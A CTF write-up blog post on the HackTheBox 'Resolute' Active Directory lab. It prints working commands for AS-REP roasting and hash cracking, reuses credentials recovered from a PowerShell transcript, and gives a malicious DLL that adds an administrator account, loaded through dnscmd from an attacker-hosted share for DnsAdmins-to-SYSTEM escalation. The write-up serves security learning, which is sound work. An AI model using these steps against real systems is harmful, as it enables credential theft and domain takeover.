>_
The Fuzz.
← /blog
CTF Writeups

HTB: Resolute — From AS-REP Roasting to DnsAdmins Privilege Escalation

A clean walkthrough of HackTheBox's Resolute box. Enumeration, AS-REP roast, lateral movement via password reuse, and DLL injection through DnsAdmins.

$ author 0xFuzz·Apr 18, 2026·11 min read
htbactive-directorydnsadminskerberos

Resolute is a classic Active Directory box on HackTheBox. Nothing here is novel, but it stitches three real-world primitives together cleanly: AS-REP roasting, password reuse, and DnsAdmins DLL injection. A good warm-up before any AD assessment.

Recon

nmap finds the usual AD services — Kerberos, LDAP, SMB, WinRM. Anonymous LDAP gives us a user list and an interesting comment field on user melanie.

nmap.sh
$ nmap -p- --min-rate 5000 -sV 10.10.10.169
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
389/tcp   open  ldap          Active Directory LDAP (megabank.local)
445/tcp   open  microsoft-ds
5985/tcp  open  http          WinRM
found

LDAP description on melanie: "Account created. Password: Welcome123!"

AS-REP roasting

Welcome123! doesn't actually work for melanie, but the user list is gold. We sweep for AS-REP-roastable accounts — accounts with "Do not require Kerberos preauthentication" set.

asrep.sh
$ GetNPUsers.py megabank.local/ -usersfile users.txt -no-pass
[*] no preauth: melanie@megabank.local
$krb5asrep$23$melanie@MEGABANK.LOCAL:af1b...:8f02...
 
$ hashcat -m 18200 hash rockyou.txt
$krb5asrep$23$melanie@...:Welcome123!

Welcome123! works for melanie. WinRM is open, so we drop straight to a shell with evil-winrm.

Lateral to ryan

On the box, a hidden directory at C:\PSTranscripts contains an old transcript with ryan's password in cleartext. Password reuse across accounts is the entire lesson here.

transcript.ps1
PS> Get-ChildItem -Force C:\
d-----   PSTranscripts
 
PS> Get-Content C:\PSTranscripts\...\20191203...txt
# ...net use \\fs01 /user:ryan Serv3r4Admin4cc123!...

DnsAdmins to SYSTEM

ryan is a member of DnsAdmins. The classic primitive: register a malicious DLL as the DNS server's plugin, restart the service, and the DLL runs as SYSTEM.

payload.c
#include <windows.h>
 
BOOL WINAPI DllMain(HMODULE h, DWORD reason, LPVOID r) {
    if (reason == DLL_PROCESS_ATTACH) {
        system("net user fuzz Pwned1! /add");
        system("net localgroup administrators fuzz /add");
    }
    return TRUE;
}
register-and-restart.ps1
PS> dnscmd.exe /config /serverlevelplugindll \\10.10.14.5\share\payload.dll
PS> sc.exe stop dns ; sc.exe start dns
# fuzz is now Administrators. Pop a shell as fuzz.

Flags

typevaluenote
user.txt0a8c...e91as melanie
root.txt1f23...c40as fuzz (admin)
$ echo "thanks for reading" | tee /dev/null
$ next post
related

More in CTF Writeups

$ open --post ctf-ddc-hi
CTF Writeups

DDC Regionals 2026 — Hidden Trouble 1

Hunting fileless WMI persistence on a dead-disk Windows 11 image. From ASEP-sweep through XOR'd C2 to the flag.

Apr 25, 202612 min